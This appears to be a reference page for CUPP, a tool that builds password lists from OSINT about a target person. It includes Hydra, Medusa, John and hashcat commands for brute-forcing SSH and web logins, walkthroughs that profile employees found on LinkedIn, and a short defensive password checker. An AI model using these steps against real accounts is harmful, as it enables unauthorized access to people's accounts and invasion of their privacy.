Cupp

CUPP (Common User Passwords Profiler) is an intelligent wordlist generator that creates custom password lists based on target-specific information. It uses OSINT data to generate likely passwords for specific users.

Installation

Linux/Ubuntu

# Clone repository
git clone https://github.com/Mebus/cupp.git
cd cupp

# Make executable
chmod +x cupp.py

# Optional: Create symbolic link
sudo ln -s "$(pwd)/cupp.py" /usr/local/bin/cupp

macOS

# Install via Homebrew
brew install cupp

# Or from source
git clone https://github.com/Mebus/cupp.git
cd cupp
python3 -m pip install -r requirements.txt

Basic Usage

Interactive Mode

# Start interactive profiling session
python3 cupp.py -i

# Answer prompts for:
# - Target name
# - Surname
# - Birthdate
# - Birthplace
# - Company
# - Position
# - Pet names
# - Hobbies
# - Other interests

Command-Line Options

Option                   Description
-i, --interactive        Interactive mode (guided questionnaire)
-w, --wordlist <FILE>    Use existing wordlist as base
-l, --leet               Add leetspeak variations
-u, --uppercase          Add uppercase variations
-d, --download           Download common wordlists from GHDB
-f, --file <FILE>        Input file with target data
-o, --output <FILE>      Output file for wordlist
-m, --minlen <NUM>       Minimum password length
-M, --maxlen <NUM>       Maximum password length
-v, --verbose            Verbose output

Interactive Profiling

Complete Profile Creation

# Run interactive mode
python3 cupp.py -i

# Expected prompts and typical responses:
# Target name: john
# Target name (surname): smith
# Birthdate (DD/MM/YYYY): 15/06/1985
# Birthplace: london
# Company: acme-corp
# Company position: admin
# Pet names: fluffy,rover
# Hobbies: gaming,football
# Other interests: cars,travel

# Output: john.txt (wordlist file)

Output Wordlist

# Generated wordlist includes variations like:
john
smith
john15
smith1985
fluffy
rover
gaming
football
cars
travel
john@1985
smith2001
fluffy123
# ... plus many more combinations

Command-Line Generation

From User Data

# Create wordlist file with user information
cat > user_profile.txt << EOF
Target name: admin
Surname: user
Birthdate: 01/01/1990
Birthplace: newyork
Company: corporation
Position: administrator
Pet names: max
Hobbies: coding
EOF

# Generate wordlist
python3 cupp.py -f user_profile.txt -o admin_wordlist.txt

# Add leetspeak
python3 cupp.py -f user_profile.txt -o admin_leet.txt -l

# Add uppercase variations
python3 cupp.py -f user_profile.txt -o admin_upper.txt -u

Advanced Techniques

Leet Speak Variations

# Enable leetspeak for advanced obfuscation
python3 cupp.py -i -l

# Common leetspeak mappings:
# a -> 4
# e -> 3
# i -> 1
# o -> 0
# s -> 5
# t -> 7
# l -> 1

Length Filtering

# Generate passwords of specific length
python3 cupp.py -i -m 8 -M 16

# Short passwords (8-10 chars)
python3 cupp.py -f profile.txt -o short.txt -m 8 -M 10

# Long passwords (16+ chars)
python3 cupp.py -f profile.txt -o long.txt -m 16 -M 20

Combining with Hydra

# Generate wordlist with CUPP
python3 cupp.py -i -o target_wordlist.txt

# Use with Hydra for SSH
hydra -l admin -P target_wordlist.txt ssh://target.com

# Use with Hydra for HTTP
hydra -l admin -P target_wordlist.txt 'http-post-form://target.com/login:user=^USER^&pass=^PASS^:Invalid'

Using CUPP Dictionary

# Download and use GHDB wordlist
python3 cupp.py -d

# Generate from downloaded list
python3 cupp.py -w downloaded_wordlist.txt -o enhanced.txt -l

Real-World Profiling Scenarios

Target: IT Admin

# Collect OSINT data
# Name: Robert Johnson
# Works at: TechCorp
# Position: IT Manager
# Hobbies: Linux, security, running
# Created with CUPP:

python3 cupp.py << EOF
robert
johnson
18/04/1982
manchester
techcorp
it manager
spike
linux
security
running
EOF

# Enhanced versions
python3 cupp.py -i -l -o robert_leet.txt
python3 cupp.py -i -u -o robert_upper.txt
cat robert_leet.txt robert_upper.txt | sort -u > robert_full.txt

Target: Company Employee

# Profile multiple employees from LinkedIn/company page
cat > employees.txt << EOF
name:john
surname:smith
company:acme
position:developer
hobbies:python,git,aws
EOF

python3 cupp.py -f employees.txt -o employee_wordlist.txt

# Test all variations
# john, smith, asmith, jsmith, john_smith, etc.

Wordlist Enhancement

Combining CUPP Output with Other Lists

# Generate CUPP wordlist
python3 cupp.py -i -o cupp_base.txt

# Combine with existing wordlists
cat cupp_base.txt rockyou.txt | sort -u > combined_wordlist.txt

# Add variations (append each suffix to every word, not just the last line)
sed 's/$/123/' cupp_base.txt > cupp_suffixed.txt
sed 's/$/!/' cupp_base.txt >> cupp_suffixed.txt
sed 's/$/2024/' cupp_base.txt >> cupp_suffixed.txt
sort -u cupp_base.txt cupp_suffixed.txt > final_wordlist.txt

Create Targeted Lists

# For SSH bruteforce
python3 cupp.py -i -m 8 -o ssh_wordlist.txt

# For web applications
python3 cupp.py -i -l -u -o web_wordlist.txt

# For specific user account
python3 cupp.py -f admin_profile.txt -o admin_custom.txt -l

# Combine multiple sources
cat cupp_admin.txt cupp_default.txt rockyou.txt | sort -u > complete_wordlist.txt

Integration with Other Tools

With Hydra

# Generate custom wordlist
python3 cupp.py -i -o my_wordlist.txt

# Use with Hydra
hydra -L users.txt -P my_wordlist.txt -s 22 ssh://target.com -t 4

# HTTP form login
hydra -l admin -P my_wordlist.txt 'http-post-form://target.com/login:username=^USER^&password=^PASS^:F=incorrect'

With John the Ripper

# Generate wordlist for rules-based cracking
python3 cupp.py -i -o target_base.txt

# Apply John rules
john --wordlist=target_base.txt --rules hashfile.txt

# Or with hashcat
hashcat -m 0 hashes.txt target_base.txt

With Medusa

# Create targeted wordlist
python3 cupp.py -f profile.txt -o medusa_list.txt -l

# Run Medusa
medusa -h target.com -u admin -P medusa_list.txt -M ssh -t 4

Practical Examples

Example 1: Target Employee from LinkedIn

# OSINT gathering:
# Name: Sarah Johnson
# Company: Acme Corporation
# Position: Database Administrator
# Location: Seattle
# Birthday: July 1985
# Interests: Gardening, Travel

# Create wordlist
python3 cupp.py << 'EOF'
sarah
johnson
01/07/1985
seattle
acme
administrator
gardening
travel
EOF

# Output wordlist includes:
# sarah, johnson, sarah01, johnson85
# sarahj, sjohnson, sj1985
# gardening, travel, sarah_gardening
# Plus leetspeak: s4r4h, j0hn50n, g4rd3n1ng

Example 2: Service Account Profiling

# For automated service accounts
python3 cupp.py << 'EOF'
svc
backup
prod
service
sql
datacenter
monitoring
EOF

# Target likely variations used in corporations
# Results help crack service account passwords

Tips and Tricks

Maximize Wordlist Effectiveness

# Create profile-specific wordlist
python3 cupp.py -i -o base.txt

# Generate multiple variations
python3 cupp.py -i -o base.txt
python3 cupp.py -i -l -o leet.txt
python3 cupp.py -i -u -o upper.txt

# Combine and deduplicate
cat base.txt leet.txt upper.txt | sort -u > full.txt

# Count results
wc -l full.txt

Focus on Common Patterns

# Most likely passwords include:
# - Name + numbers (john123, sarah2024)
# - Name + company name (johnacme, sarah_corp)
# - Simple variations (john, J0hn, john!)
# - Hobbies (gardening123, travel2024)

# CUPP generates all these automatically
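
The same patterns can be rejected when a password is set. As an added example (not part of CUPP or the original page), this Python check flags a candidate password built from the account holder's own profile data, undoing the leetspeak mappings listed under Leet Speak Variations. The function names and the sample profile are assumptions made for illustration.

```python
import re

# Leetspeak substitutions from this page, inverted. "1" stands for both
# "i" and "l", so normalize() returns both readings.
UNLEET = {"4": "a", "3": "e", "0": "o", "5": "s", "7": "t"}

# Constructed sample profile (values are illustrative only).
PROFILE = {
    "name": "john", "surname": "smith", "birthdate": "15/06/1985",
    "birthplace": "london", "company": "acme-corp",
    "pets": "fluffy,rover", "hobbies": "gaming,football",
}


def normalize(password):
    """Return the lowercase, de-leeted readings of a password."""
    base = "".join(UNLEET.get(c, c) for c in password.lower())
    return {base.replace("1", "i"), base.replace("1", "l")}


def profile_tokens(profile):
    """Extract words (3+ letters) and date fragments from profile values."""
    words, dates = set(), set()
    for value in profile.values():
        words.update(re.findall(r"[a-z]{3,}", value.lower()))
        for run in re.findall(r"\d+", value):
            dates.add(run)
            if len(run) == 4:
                dates.add(run[2:])  # 1985 -> 85
    return words, dates


def check_password(password, profile):
    """List the reasons a password is guessable from the owner's profile."""
    words, dates = profile_tokens(profile)
    readings = normalize(password)
    reasons = ["contains profile word: " + w
               for w in sorted(words) if any(w in r for r in readings)]
    runs = re.findall(r"\d+", password)
    for d in sorted(dates):
        # A bare two-digit match is too common to flag on its own; count it
        # only when a profile word is present or the fragment is a full year.
        if d in runs and (len(d) >= 4 or reasons):
            reasons.append("contains profile date: " + d)
    return reasons


if __name__ == "__main__":
    for candidate in ("J0hn1985!", "fluffy123", "5m17h", "violet-kettle-orbit"):
        print(candidate, "->", check_password(candidate, PROFILE) or "ok")
```

An empty list means no profile-derived pattern was found; it does not mean the password is strong, so this check belongs alongside length and breached-password checks.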

Troubleshooting

Large Wordlist Size

# If wordlist becomes too large
wc -l output.txt

# Filter by length
awk 'length > 6 && length < 16' wordlist.txt > filtered.txt

# Use only most common patterns
grep -E '^[a-z]+[0-9]{1,4}$' wordlist.txt > likely.txt

Improving Accuracy

# Collect more OSINT data:
# - Multiple hobbies
# - Partner/family names
# - Company information
# - Pet names
# - Sports/interests

# More data = better wordlist
python3 cupp.py -i
# Spend time answering all questions thoroughly

Best Practices

  • Collect thorough OSINT before generating wordlist
  • Include multiple hobbies and interests
  • Combine with date variations
  • Test shorter passwords first (most likely)
  • Use with appropriate rate limiting in attacks
  • Document the profile used for wordlist generation
  • Review top 100 passwords first
  • Combine CUPP output with other wordlists for breadth
  • Use leet and uppercase variations for modern systems
  • Validate findings against actual target password policies

Last updated: 2025-03-30 | CUPP GitHub